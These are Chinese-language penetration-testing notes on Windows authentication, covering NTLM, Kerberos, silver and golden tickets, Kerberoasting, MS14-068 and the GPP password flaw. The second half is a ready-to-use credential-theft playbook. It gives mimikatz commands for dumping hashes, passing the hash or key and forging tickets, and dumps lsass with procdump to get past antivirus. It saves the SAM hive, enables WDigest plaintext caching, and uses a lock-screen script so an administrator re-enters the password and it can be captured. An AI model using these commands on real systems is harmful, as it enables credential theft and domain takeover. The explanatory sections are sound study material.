登录认证
域是windows下的一种统一化管理的方式,明确一点,一个电脑可以用多个账号登录,并且还可以本地用户和域用户两种方式登录,没有域环境和有域环境的认证方式不同
windows终端的管理,往往会分为,单独的主机,工作组,域环境,三种环境下认证方式均有不同
类比linux
的/etc/passwd
和/etc/shadow
的用来存放用户权限和用户密码的文件,windows同样有类似的文件是c:\system32\config\sam
在windows中的认证,大多数是考虑安全性,不会在认证通讯中传递明文密码,而是传递hash
值,因此如果获取hash
值,而没有明文密码,在一定情况下就可冒充该用户进行相应权限访问。hash
在sam
中,在具有主机的一定权限的情况下,一般可以抓到
windows下的hash类型
LM HASH
Lan manage Hash
,早期使用的hash,目前已经废弃
NT HASH
本地登录时候,以该加密方式作为存储在SAM
中
NTLM HASH
顾名思义是LM HASH
和NT HASH
的结合,大概格式一般张这样NT HSAH:LM HASH
,中间以一个:
,来隔开,也是mimikatz
抓取到的hash
储存在SAM
文件中,如果存在域环境,也储存在域控的NTDS.dit
文件中
本地登录
使用密码的NT HASH
加密与SAM
中的对应数据比较
可以ps看下windows系统,登录认证需要以下2个exe来完成
简而言之
账号/密码 --接收--> winlogon.exe --传递--> lsass.exe --NT HASH加密--> sam 中比对
但是现在一台windows一般要么在工作组中,要么在域环境下的
工作组登录
登录使用是NTML HASH
,登录的验证方式叫做challenge/Response
,也就是挑战/响应
机制
工作组是有一台(服务器端和客户端都是本身)或多台电脑的,在组中的服务器端上存有可以登录账号的NTML HASH
值
- 客户端发送账号登录请求给服务器端
- 服务器端随机生成16位的
challenge
,并与客户端要登录的账号的NTLM HASH
进行签名生成challenge-server
,并把challenge
发送给客户端 - 客户端手上的账号的密码先进行
NTLM HASH
运算,并再次和拿到的challenge
进行运算得到challenge-client
,并把challenge-client
发送给服务器端 - 服务器拿到
challenge-client
与challenge-server
进行比较,相同则表示认证通过
可以看到工作组的登录认证,全程没有明文密码的传递,是通过随机生成challenge
进行加密传输认证
域登录
域中要登录一台主机,可以使用2种账号,域用户和域主机账号
域用户由域控管理,他会在域控上分配域用户可以登录哪些主机的权限
域主机账号即能登录该主机的账号,但一般不可登录其他服务器
域和工作组、本地不同在于,登录的时候指定是域登录则要以domain\username
的形式输入用户名,表明是domain
域下的用户要请求登录
与工作组不同的地方在于,服务器端只是作为中转,验证身份的为域控,即存储管理NTML HASH
的地方是域控
- 客户端发送账号登录请求给服务器端
- 服务器端生成
challenge
,发送回客户端(与工作组想比这里没有生成challenge-server
) - 客户端拿密码生成
NTML HASH
与challenge
加密,生成NET NTML HASH
发送给服务器端 - 服务器端将拿到
NET NTML HASH
,将手上的challenge
,账号
发送给域控 - 域控拿对应账号的
NTML HASH
与challenge
加密,与NET NTML HASH
进比较,相同即通过
加密版本:
NTLM v1: 生成的challenge
是8位
NTLM V2: 生成的challenge
是16位, 在2008,win7之后都是该版本
Kerberos认证
在域中的一个终端,要访问域中的一个服务器时,服务器要明确这个终端是不是有权限访问自己,和不和法之类的问题并不是服务器端校验,而是通过在域中的第三方KDC
服务器管理的
而KDC
又分为两部分,分别是AS(Authentication Server)
以及TGS(Ticket Granting Server)
明确每个机器有什么东西
- 客户端:有当前登录账号的密码
- AS服务器:生成与TGS服务器交互的凭证
- TGS服务器:有服务器端的信息,用户访问服务器的权限信息,颁发给客户端凭证的
- 服务器:提供服务的
认证步骤:
-
客户端
发送自己的ID
,网络状况
给AS服务器
-
AS服务器
发送2条请求给客户端
-
TGS-Session-Key
, 这个是用来与TGS
通信的,根据客户端的账号
的密码加密的 -
TGT
,这个是有TGS-Session-Key
和时间戳,访问目标服务器等信息,根据KRBTGT的hash
加密的
-
-
客户端
接收TGS-Session-Key
通过客户端的账号
的密码解密得到密钥,将本地信息与密码加密,生成Server-Session-Key
发给TGS
客户端
接收到TGT
不做处理,直接发给TGS
-
TGS
收到TGT
,利用KRBTGT的hash
进行解密获取访问服务器的信息,进行校验,判断是否能够通过判断通过后,再将
Server-Session-Key
与时间戳,生命周期等信息通过服务器的hash
进行加密生成Server-Ticket
发送给客户端
-
客户端
收到TGS
发回的信息,用Server-Session-Key
解密,解密内容加上ID
网络状况
等信息,再用Server-Session-Key
加密,发给服务器
客户端
收到TGS
发回的Server-Ticket
直接一并发服务器
-
服务器
拿到Server-Ticket
解密,验证通过,之后与客户端
建立通讯连接
简而言之,最终客户端
会拿到一个Server-Ticket
用来告诉服务器
自己的身份,而在渗透中拿用户的Hash
则可以伪造身份,生成Ticket
,而不需要明文密码。
票据
在整个Kerberos
认证中,不难发现需要的有三个hash
:客户端hash
,服务器端hash
,KRBTGT的hash
而这三个hash
服务器上:有服务器的hash
客户端上:有客户端的hash
KDC上:有大家所有人的hash
客户端的hash用于,客户端与AS服务器通信,主要作用是确定客户端身份
KRBTGT的hash用于,客户端与TGS的通信,主要作用是确定服务器信息和客户端的权限
服务器端的hash用于,客户端与服务器端的通信,主要是验证客户端的身份
- 那么有服务器的
hash
,即使没有KRBTGT的hash
也能访问目标服务器 - 如果有了
KRBTGT
的hash
,则能访问所有服务器的权限
白银票据(Silver Ticket)
有目标服务器的hash
,可以利用其伪造Ticket
,达到访问指定目标服务器的作用。伪造的Ticket
就叫做白银票据。
黄金票据(Golden Ticket)
有了KRBTGT
的账号,这个账号在域控中,是建域自动生成的,KDC一般也是域控。有了KRBTGT
的hash,则能伪造访问所有域中服务的Ticket
Kerberoasting
利用TGS发回给客户端时,携带了服务器端的hash
,爆破该hash
,成功既能获得服务器的明文密码
漏洞
MS14-068:如果域控即KDC,有该漏洞,那么可以使一个普通域用户变成域控,原理即和Kerberos认证有关。
组策略首选项 + SYSVOL (GPP漏洞 —2k08)
SYSVOL`存在于域中的所有域控中。包含公共文件的共享文件夹,包括组策略数据 ,经过认证的用户都可以访问该文件夹。所有域组策略都存储在这里:`\\ <DOMAIN> \ SYSVOL \ <DOMAIN> \ Policies \
在win2k8
中添加了GPP
选项,即组策略首选项,可以完成更多的系统及应用管理,比如说管理本地用户 添加计划任务等。
在08的域控上为域主机远程添加用户,所有的操作都会写到Group.xml
文件中,包括创建的账户名称 时间 以及加密后的密码。该密码默认是用AES256
加密的,而且官方提供了完整的密钥,正好用来解密得到密码。漏洞的补丁编号为KB2962486
.
通过HASH进行登录
在渗透中,拿不到明文密码,只是通过SAM等文件抓取到了NTML之类的hash值,是可以通过hash值进行登录其他主机的
pth
pass the hash(pth)
,在上述生成challenge-client
的过程中,没有密码,但有NTML HASH
一样是能够通过认证的,通过NTML HASH
进行其他主机登录的方式即叫pth
微软在12年发布了针对pth
的补丁KBb2871997
,意味着没法使用pth
来登录了,但是这补丁的不足之处在于Administrator
账号没有被限制,该账号的SID
为500
, 也就是说SID
为500
的账号不会受限制
如果禁用了NTML
认证,PsExec
无法利用获得的NTML hash
进行远程连接,但是使用mimikatz
还是可以攻击成功
mimikatz使用方法
//先获取hash
privilege::debug
sekurlsa::logonpasswords
//使用sekurlsa::pth 模块进行突破
sekurlsa::pth /user:administrator /domain:test /ntlm:ccef208c6485269c20db2cad21734fe7
ptk
pass the key(ptk)
是在pth
不能用时,利用mimikatz的AES keys的方式代替NTML hash
的一种方法
//先获取aes加密
privilege::debug
sekurlsa::ekeys
//使用sekurlsa::pth 模块使用aes方式
"sekurlsa::pth /user:administrator /domain:test /aes256:c4388a1fb9bd65a88343a32c09e53ba6c1ead4de8a17a442e819e98c522fc288"
ptt
清楚票据
kerberos::purge
klist purge
黄金票据
先获取krbtgt的hash
privilege::debug
使用key,来注入票据
lsadump::dcsync /user:krbtgt
mimikatz # kerberos::golden /domain:rootkit.org /sid:sid/aes256:ase256 /user:administrator /ticket:admin.kirbi
使用hash,来注入票据
lsadump::lsa /patch 导出hash
kerberos::golden /domain:rootkit.org /sid:sid /krbtgt:hash /user:administrator /ticket:admin.kirbi
白银票据
kerberos::golden /user:dbadmin /domain:rootkit.org /sid:sid /targe
t:Srv-Web-Kit.rootkit.org /rc4:ntlm_hash /ptt
测试中的操作
解决杀软杀掉mimikatz
在有杀软时,可以使用以下方式获取lsass.exe的哈希,并下载到本地用mimikatz
解密
目标在system32下
procdump.exe -accepteula -ma lsass.exe lsass.dmp
本机
sekurlsa::minidump lsass.dump
sekurlsa::logonpasswords
目标
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
本机
lsadump::sam /system:system.hiv /sam:sam.hiv
解决windows10,windows server2012 抓不到明文密码
在windows10,windows server 2012以上,即使弱口令,mimikatz
抓不到明文密码的,可以使用以下方法
设置注册表,使其能抓明文密码
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
锁屏脚本,使管理员再次输入密码,即会被抓取
Function Lock-WorkStation {
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWo rkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
} Lock-WorkStation
注销,使管理员再次输入密码,即会被抓取
logoff.exe
参考资料
https://www.cnblogs.com/bmjoker/p/10355979.html#autoid-1-3-0
https://www.cnblogs.com/zpchcbd/p/11738923.html
https://blog.csdn.net/sky_jiangcheng/article/details/81070240